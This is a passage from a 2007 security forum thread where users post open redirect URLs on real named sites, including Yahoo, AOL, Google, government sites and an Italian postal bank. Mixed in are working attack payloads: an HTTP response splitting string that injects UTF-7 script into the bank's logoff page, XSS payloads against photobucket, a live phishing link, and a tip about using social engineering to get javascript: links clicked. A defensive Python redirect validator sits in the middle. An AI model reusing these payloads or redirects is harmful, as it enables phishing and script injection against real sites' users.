Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 8 of 11
Re: So it begins - Redirects Edition
Posted by: tx
Date: February 20, 2007 03:16PM

http://http.edge.ru4.com/smartserve/ttplus?placement=tp-1125-033&target=http://www.google.com

-tx @ lowtech-labs.org

Re: So it begins - Redirects Edition
Posted by: rsnake
Date: February 21, 2007 10:06AM

Just saw this beauty in my inbox (takes you to a phishing site):

http://www.aol.com/ams/clickThruRedirect.adp?1073762100,2147779757x2147568413,http://0xca.0x47.0x6b.0xd9/~acid/www.moneybookers.com/index.htm

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins - Redirects Edition
Date: February 21, 2007 10:13AM

lol nice.

Re: So it begins - Redirects Edition
Posted by: tx
Date: February 22, 2007 04:29PM

http://club.pchome.net/rd.php?pid=137&tag=club_update_1&tgt=http://www.google.com

-tx @ lowtech-labs.org

Re: So it begins - Redirects Edition
Posted by: daltd
Date: February 23, 2007 02:34AM

http://www.pbs.org/teachersource/previews/redir/http://www.google.com
http://www.indiapress.org/directory/redirect/r.php?a=http:--www.google.com
http://www.madaboutjewellery.com/cgi-bin/click.cgi?link=www.google.com

Re: So it begins - Redirects Edition
Posted by: trev
Date: February 23, 2007 05:10PM

http://www.kmstudio.com.ua/index.htm?http://www.google.com/

It is an XSS at the same time but who cares...

Re: So it begins - Redirects Edition
Posted by: tx
Date: February 23, 2007 05:13PM

http://www.merck.com/htbin/redirects/redirector.pl?url=http://www.google.com
Same with this one (redirect/xss)

-tx @ lowtech-labs.org

Re: So it begins - Redirects Edition
Posted by: Spyware
Date: February 24, 2007 05:10PM

This one is probably listed somewhere, but I'm too tired to check all the pages :O

http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_i=acca0978-f1be-4af3-902d-11afaccc71e8&_u=http://www.asdf.com

you can enter javascript:(bla) too but you will need to use some SE to make them click the link (you will understand when you try..)

Re: So it begins - Redirects Edition
Posted by: Spyware
Date: February 24, 2007 05:11PM

http://www.sbc.net/redirect.asp?url=http://www.asdf.com

Re: So it begins - Redirects Edition
Posted by: Spyware
Date: February 24, 2007 05:13PM

http://www.webmasterworld.com/re4.cgi?f=&d=&url=HTTP://www.google.com

Re: So it begins - Redirects Edition
Posted by: Spyware
Date: February 25, 2007 05:26AM

http://www.ojjdp.ncjrs.gov/exit.asp?go=1&url=http://www.google.com
They actually thought the go=1/0 thingy was going to stop redirects ;x -smashes head on table-

Re: So it begins - Redirects Edition
Posted by: hiredhacker
Date: February 25, 2007 09:22AM

http://wwwm.meebo.com/redirect.php?http://www.hiredhacker.com

-peavey

--------------------------
http://www.hiredhacker.com

Re: So it begins - Redirects Edition
Posted by: Spyware
Date: March 01, 2007 01:23PM

http://rds.yahoo.com/_ylt=A0geu9xGJ.dFshUA1TCl87UF/SIG=11qsb76n0/EXP=1172863174/**http://www.pentagon.gov

Yahoo! Another redirect on Yahoo. They have a patch for the other areas of the site. Kinda weird they didn't patch this.

Re: So it begins - Redirects Edition
Posted by: trev
Date: March 01, 2007 02:25PM

That's really weird, the parameters are actually ignored. http://rds.yahoo.com/**http://www.google.com is enough, it will redirect to anything. That looks like a temporary malfunction, I tried this only two days ago and it would show a warning page.

Edit: rd.yahoo.com shows a warning but rds.yahoo.com doesn't. LOL



Edited 1 time(s). Last edit at 03/08/2007 09:10AM by trev.

Re: So it begins - Redirects Edition
Posted by: Spyware
Date: March 01, 2007 04:08PM

[removed]

Microsoft secure? Nooo way :P

And AOL too

http://www.aol.com/redir.adp?_e_t=ap&_a_v=2.0&_a_i=100124311x1116333809x1077456677&_url=http://www.pentagon.gov



Edited 1 time(s). Last edit at 03/02/2007 06:51AM by Spyware.

Re: So it begins - Redirects Edition
Posted by: Spyware
Date: March 02, 2007 06:47AM

http://www.usashopcn.com/dg.asp?url=http://www.pentagon.gov

opens site in frame.

Re: So it begins - Redirects Edition
Posted by: Spyware
Date: March 02, 2007 07:25AM

http://www.defendamerica.mil/cgi-bin/bye.cgi?http://www.google.com/

.mil =]

Re: So it begins - Redirects Edition
Posted by: SW
Date: March 05, 2007 12:53PM


Re: So it begins - Redirects Edition
Posted by: rsnake
Date: March 05, 2007 04:25PM

From a lurker:


I have found an interesting url redirect in the italian postepay card web site.

The interesting thing is that, even today, there are developers who don't care about possible URL encoding. So the result is that this URL doesn't work:

https://bancopostaonline.poste.it/bpol/comuni/bpollogoff.asp?goto=http://www.google.com

because the / characters are stripped, instead the following url works:

https://bancopostaonline.poste.it/bpol/comuni/bpollogoff.asp?goto=http:%2f%2fwww.google.com

I'm contacting you because I understand that a URL redirection in a web site search engine is not so bad, but in this case (a bank-like web site) the problem is not acceptable, also because the web site has a beautiful anti-phishing Flash demo http://www.poste.it/online/phishing_video.shtml :)

Oh, of course I have said nothing about this problem to the web site administrator :)

Ciao,
s4tan

Re: So it begins - Redirects Edition
Posted by: trev
Date: March 06, 2007 07:10AM

That's HTTP Response Splitting as well:

https://bancopostaonline.poste.it/bpol/comuni/logoff.fcc?goto=%0AContent-Type:%20text/html;%20charset=UTF-7%0A%0A%2BADw%2Dscript%2BAD4%2Dalert(%22XSS%22);%2BADw%2D%2Fscript%2BAD4%2D

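The two posts above show the same parameter failing in two ways: a filter that strips "/" before the value is percent-decoded (so %2f gets through), and a value that reaches a response header with a raw newline in it (response splitting). The following is an added example, not code from the posts or from the site they discuss. It models the stripping filter as s4tan describes it, next to a redirect validator that decodes first, rejects control characters, folds backslashes into slashes (the IE behaviour trev mentions further down the thread), and only then checks the target against an allowlist. The allowlist hosts and the default landing path are assumptions for the example.

```python
from urllib.parse import unquote, urlsplit

# Assumption for the example: the only hosts this "logoff" page may send users to.
ALLOWED_HOSTS = {"bancopostaonline.poste.it", "www.poste.it"}
DEFAULT_TARGET = "/bpol/comuni/"  # assumed safe landing page


def naive_goto_filter(raw_goto: str) -> str:
    """Models the filter described in the thread: '/' is stripped from the raw
    query value, and percent-decoding happens afterwards. A literal slash is
    removed, but %2f survives the filter and decodes to '/' later."""
    stripped = raw_goto.replace("/", "")
    return unquote(stripped)  # value that would end up in the Location header


def fully_decode(value: str, rounds: int = 3) -> str:
    """Decode until stable so that double-encoded input (%252f) is normalised
    before any checks run. Bounded so that pathological input cannot loop."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_redirect_target(raw_goto: str) -> str:
    """Return a redirect target that is safe to place in a Location header,
    or DEFAULT_TARGET if the supplied value is not acceptable."""
    value = fully_decode(raw_goto)

    # Response splitting: CR, LF or any other control character in a header
    # value is never legitimate in a redirect target.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        return DEFAULT_TARGET

    # Browsers (IE in trev's photobucket note) treat '\' as '/', so
    # '/\evil.example' is really '//evil.example'. Normalise before parsing.
    value = value.replace("\\", "/")

    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative URL: allow only http(s) to known hosts.
        # hostname drops userinfo, so 'http://poste.it@evil/' is judged by 'evil'.
        if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
            return value
        return DEFAULT_TARGET

    # Relative target: must be a single-slash path on this site.
    if not value.startswith("/") or value.startswith("//"):
        return DEFAULT_TARGET
    return value


if __name__ == "__main__":
    for goto in (
        "http://www.google.com",
        "http:%2f%2fwww.google.com",
        "%0AContent-Type:%20text/html",
        "/%5Cwww.google.com",
        "/bpol/home.asp?x=1",
    ):
        print(f"{goto!r:40} naive={naive_goto_filter(goto)!r:32} "
              f"safe={safe_redirect_target(goto)!r}")
```

The naive filter is what makes the %2f variant "work": the check runs on the raw bytes while the header is built from the decoded ones. Any validation of a redirect target has to run on the same form of the value that gets emitted, which in practice means decode fully, then parse, then compare against an allowlist.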
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: March 08, 2007 04:35PM

From BeNi:

http://www.google.com/local/add/changeLocale?currentLocation=http%3A%2F%2Fwww.mybeNi.tk&selectLocale=de_DE

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins - Redirects Edition
Posted by: Spikeman
Date: March 09, 2007 03:43AM

http://photobucket.com/images/0;url=HACKER%22http-equiv=refresh%3E

Can't quite get it to work right yet. Using forward slashes break it. I tried to get it to redirect to a picture in my album, but it escapes the quote so it doesn't work right.

Re: So it begins - Redirects Edition
Posted by: trev
Date: March 09, 2007 06:13AM

http://friends.newtelligence.net/clemensv/ct.ashx?url=http://google.com/

http://photobucket.com/images/0;url=http:%5Cgoogle.com%22%20http-equiv=refresh/ - works in Internet Explorer (it converts backslashes into forward slashes)

But it is probably easier to XSS this site: http://photobucket.com/images/%22%3E%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E/

Re: So it begins - Redirects Edition
Posted by: rsnake
Date: March 09, 2007 03:24PM

Very nice, haha!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins - Redirects Edition
Posted by: tx
Date: March 09, 2007 09:39PM

For the stile-pr0n lovers: http://x.stilenet.com/x/out.php?http://www.google.com

-tx @ lowtech-labs.org

Re: So it begins - Redirects Edition
Posted by: tx
Date: March 10, 2007 12:19AM

http://msxml.infospace.com/home/clickit/search?rawto=http://www.google.com

-tx @ lowtech-labs.org

Re: So it begins - Redirects Edition
Posted by: malorn
Date: March 10, 2007 02:27AM

http://news.google.com/news/url?sa=t&ct=us/5-1-0&fp=45f2d398d4ff6b31&ei=U2vyRcGuC5PqqAOevuCcCg&url=http://ha.ckers.org

Re: So it begins - Redirects Edition
Date: March 10, 2007 04:42AM

http://www.redirect.to.url.com/search/result?url=http://www.awesomeandrew.net


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins - Redirects Edition
Posted by: trev
Date: March 10, 2007 09:58PM

All those parked domains, they must be good for something...

http://mopedshops.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://strippokerschool.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://onlinepkoergame.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://german-pinschers.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://kentuckywines.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://atv-store.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/
http://free-magic.com/site/redirps.htm?vars=%7C%7Chttp://www.google.com/

4,700 more of those: http://www.ultimatedomains.com/
And another 500,000: http://www.fabulousdomains.com/

http://ageusa.com/click.php?lfzxpset%3Eb%27vsm%3Eiuuq%3B00hpphmf%2Fdpn
http://aimus.com/click.php?lfzxpset%3Eb%27vsm%3Eiuuq%3B00hpphmf%2Fdpn
http://myaddress.com/click.php?lfzxpset%3Eb%27vsm%3Eiuuq%3B00hpphmf%2Fdpn
http://franchises.tv/click.php?lfzxpset%3Eb%27vsm%3Eiuuq%3B00hpphmf%2Fdpn

Hundreds more of those: http://www.google.com/search?q=%22This+domain+is+for+sale.+Please+contact+us+for+more+information.%22. Try to crack the "code" :)



Edited 3 time(s). Last edit at 03/10/2007 11:09PM by trev.

Re: So it begins - Redirects Edition
Posted by: kirke
Date: March 11, 2007 04:40AM

not really a redirect, but perfect frame spoofing (requires malware aka JavaScript enabled:)

http://www.kreditwerk.de/opener.html?kat=nav_links_UNSERUNTERNEHMEN__?cont=http://ha.ckers.org/images/stallowned.jpg
